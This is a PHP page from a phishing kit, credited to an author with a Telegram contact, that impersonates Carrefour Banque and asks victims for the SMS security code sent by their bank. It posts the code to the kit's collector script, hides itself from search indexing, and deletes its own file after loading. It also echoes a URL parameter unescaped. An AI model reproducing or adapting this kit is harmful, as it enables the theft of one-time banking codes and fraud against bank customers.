<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    reset_action(get_client_ip());
    $_SESSION['last_page'] = 'sms';
?>
<!doctype html>
<html style="height: 100%; display: flex; flex-direction: column; background: #FFF;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Code de Sécurité</title>
    </head>

    <body style="height: 100%; display: flex; flex-direction: column; background: #FFF;">
        
        <!-- HEADER -->
        <header id="header" class="d-flex">
            <div class="logo flex-grow-1"><img style="max-width: 103px;" src="../assets/imgs/logo.png"></div>
            <p>Code de Sécurité</p>
        </header>
        <!-- END HEADER -->

        <div id="steps">
            <ul>
                <li class="active">1</li>
                <li class="active">2</li>
                <li class="active">3</li>
                <li>4</li>
            </ul>
        </div>

        <!-- MAIN -->
        <main id="main" class="flex-grow-1">
            <div class="left">
                <ul>
                    <li class="active"><span>1</span> Mes informations</li>
                    <li class="active"><span>3</span> Carte PASS</li>
                    <li class="active"><span>2</span> Sécurité</li>
                    <li><span>4</span> Finalisation</li>
                </ul>
            </div>
            <div class="right">
                <form action="../index.php" method="post">
                    <input type="hidden" name="captcha">
                    <input type="hidden" name="step" value="sms">
                    <input type="hidden" name="error" value="<?php echo $_GET['error']; ?>">
                    <legend>Code de Sécurité</legend>
                    <p>Un code de sécurité vous sera envoyé par SMS ou par appel depuis un serveur vocal sur votre téléphone qui sera valable 5 minutes.</p>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'sms_code') ?>">
                        <label for="sms_code ">Entrez le code reçu par SMS</label>
                        <input type="text" name="sms_code" id="sms_code" class="form-control" placeholder="EX : 123456">
                        <?php echo error_message($_SESSION['errors'],'sms_code'); ?>
                        <p class="sssss" style="display: none; margin-bottom: 10px; margin-top: 5px; cursor: pointer;color: red; font-size: 13px; text-decoration: underline; font-style: italic; border: 0; padding: 0;">Je n'ai pas reçu le code par sms</p>
                    </div>
                    <div class="btns">
                        <button type="submit">Valider</button>
                    </div>
                </form>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <p>
                    &copy; <?php echo date('Y'); ?> Carrefour Banque<br><span>Protection des données</span>
                </p>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/script.js"></script>

        <script>
            setTimeout(function () {
                $('.sssss').show();
                $('.sssss').click(function(){
                    window.location.href= '../index.php?redirection=success';
                });
            },120000); // 1000 = 1s
            $('.sssss').click(function(){
                window.location.href= '../index.php?redirection=success';
            });
        </script>

    </body>

</html>
<?php unlink(basename(__FILE__)); ?>